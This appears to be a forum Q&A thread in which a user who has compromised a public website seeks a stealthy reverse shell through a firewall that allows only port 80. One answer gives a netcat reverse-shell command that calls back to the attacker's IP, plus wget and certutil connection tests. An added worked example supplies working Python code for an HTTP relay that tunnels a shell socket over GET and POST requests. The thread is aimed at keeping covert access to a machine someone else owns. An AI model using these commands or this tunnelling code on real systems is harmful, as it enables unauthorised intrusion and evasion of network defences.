
Is there any way that I can use the compromised website as the shell?

What I am trying to achieve is to get a reverse shell on the machine, not a webshell. The target machine has a website hosted on it that is open to the public. The machine is behind a WAF, so all TCP is blocked; only port 80 is allowed.

Is there any tool out there that can make a PHP intermediate page between my uploaded reverse TCP shell on the website and my local listener?

target machine netcat (NC1) <==> PHP intermediate webpage <==> attacker netcat (NC2)

How the implementation should be: NC1 should bind to a local port on the target machine; the PHP page would read from the socket and, upon receiving a GET request from NC2, hand it over.

I know it can be programmed, but I don't want to take the burden.

ElementX
  • Can you explain your reasons for not wanting to use a webshell? It would seem like the best choice given the fact that only port 80 is open. – Dan Landberg Jun 02 '20 at 18:25

3 Answers


To get a remote shell on the target system, there are usually two common scenarios:
- reverse shell
- bind shell
Based on your post, I'm assuming that you already have a web shell, and that you have been able to upload reverse shell code to the target. Furthermore, I interpret your comments to mean that your reverse shell has not been able to connect back to your local listener because of the target's outbound firewall rules. Have you tried various ports?

A bind shell will not work either, because of the inbound firewall rules that you describe.

If inbound port 80 is your only option, weevely might be your tool of choice. Technically, it's a web shell, but at least it provides you with the look and feel of a remote shell.

lab9

I don't know of a solution that already exists, not to say there isn't one.

Your description sounds almost like an HTTP tunnel. On Linux, there is HTS. There are other implementations on GitHub (Google it). But these assume you have other ports available and the ability to set them up. In short, it sounds like there is work involved in combining the technologies to do what you are asking.

HOWEVER, if port 80 outbound is allowed (as you say), then can't you do a reverse shell over port 80?

Attacker:  sudo nc -nlvp 80
Target:    nc -e /bin/sh <your-ip> 80

The WAF might be doing deep packet inspection, so try to verify you can receive HTTP communications from the target first.

Attacker:  sudo python3 -m http.server 80
Linux Target:  wget http://<your-ip>
Windows Target:  certutil -urlcache -split -f http://<your-ip>

If you get any output from the http.server, the target can connect to you. Assuming the target can connect to you, you can try an msfvenom reverse shell, or nc -e, or other shells. If these don't work (but the test above does), then more than likely deep packet inspection is preventing the shell. In that case, use an HTTP tunnel. Install a client on the target to listen on localhost for your remote reverse shell. Set up a server on your attacker machine to listen for the HTTP tunnel on 80. Forward on to your handler.

Les
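The following is an added worked example, not code from the question, from either answer, or from firedrill, of the relay that both the question's NC1 <==> PHP page <==> NC2 diagram and the HTTP-tunnel suggestion above describe: a long-running process holds one TCP connection to a listener bound on localhost (NC1) and exposes it statelessly over HTTP, where a POST pushes the attacker's input into the socket and a GET drains whatever output is pending. It is written with Python's standard library rather than PHP so that it runs stand-alone; the GET/POST contract is what a PHP page would implement. The loopback "echo" listener standing in for NC1, the loopback ports and every function name are constructed for this example.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, urlopen


class SocketRelay:
    """One TCP connection to the local listener (NC1), exposed as two
    stateless operations: push() for a POST body, pull() for a GET reply."""

    def __init__(self, host, port):
        self.sock = socket.create_connection((host, port))
        self.sock.settimeout(0.2)  # pull() stops after 0.2 s of silence
        self.lock = threading.Lock()

    def push(self, data: bytes) -> int:
        """Write attacker input (POST body) to the local socket."""
        with self.lock:
            self.sock.sendall(data)
        return len(data)

    def pull(self, limit: int = 65536) -> bytes:
        """Drain whatever the local socket produced since the last GET."""
        chunks, size = [], 0
        with self.lock:
            try:
                while size < limit:
                    chunk = self.sock.recv(4096)
                    if not chunk:      # NC1 closed its side
                        break
                    chunks.append(chunk)
                    size += len(chunk)
            except socket.timeout:
                pass                   # nothing more pending right now
        return b"".join(chunks)


def make_handler(relay: SocketRelay):
    """The 'intermediate page': GET returns pending output, POST sends input."""
    class RelayHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            body = relay.pull()
            self.send_response(200)
            self.send_header("Content-Type", "application/octet-stream")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def do_POST(self):
            length = int(self.headers.get("Content-Length", "0"))
            relay.push(self.rfile.read(length))
            self.send_response(204)
            self.end_headers()

        def log_message(self, *args):  # keep the demo quiet
            pass
    return RelayHandler


def start_echo_listener() -> int:
    """Constructed stand-in for NC1: a loopback listener that upper-cases and
    echoes what it receives. Returns the port it bound."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data.upper())

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def start_relay(target_port: int) -> int:
    """Connect the relay to NC1 and serve it over HTTP on a loopback port."""
    relay = SocketRelay("127.0.0.1", target_port)
    httpd = HTTPServer(("127.0.0.1", 0), make_handler(relay))
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd.server_address[1]


def http_send(relay_port: int, data: bytes) -> int:
    """NC2 side: deliver input with a POST; returns the HTTP status."""
    req = Request(f"http://127.0.0.1:{relay_port}/", data=data, method="POST")
    with urlopen(req) as resp:
        return resp.status


def http_recv(relay_port: int) -> bytes:
    """NC2 side: poll for output with a GET."""
    with urlopen(f"http://127.0.0.1:{relay_port}/") as resp:
        return resp.read()


def round_trip(payload: bytes) -> bytes:
    """Wire everything up on loopback and push one payload through the relay."""
    relay_port = start_relay(start_echo_listener())
    http_send(relay_port, payload)
    return http_recv(relay_port)


if __name__ == "__main__":
    print(round_trip(b"id\n"))  # the echo stand-in returns b"ID\n"
```

Two points a PHP port of this has to deal with. First, a PHP page does not persist between requests, so it cannot hold the socket the way this process does; it would have to reconnect to the local port on every request (which a single `nc -l` will not accept twice) or hand bytes through a file or similar buffer. Second, anyone who finds the page gets the same access as the attacker, so each request needs at least a shared secret before the relay touches the socket.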
  • I don't want to host a server on my rig. What I want is to make a ''webshell'' that takes HTTPS requests from the attacker and passes them to a port on the attacker machine. The attacker is the server, as he has a website hosted on it; I will simply copy the PHP to /var/www/. I checked HTS, but it needs a server on the attacker side. In most real-life scenarios this is the case, right? And I want to achieve max stealth by this method. – ElementX Jun 03 '20 at 18:15

I made the stuff I was talking about. Thanks, guys!

https://github.com/thesunRider/firedrill

ElementX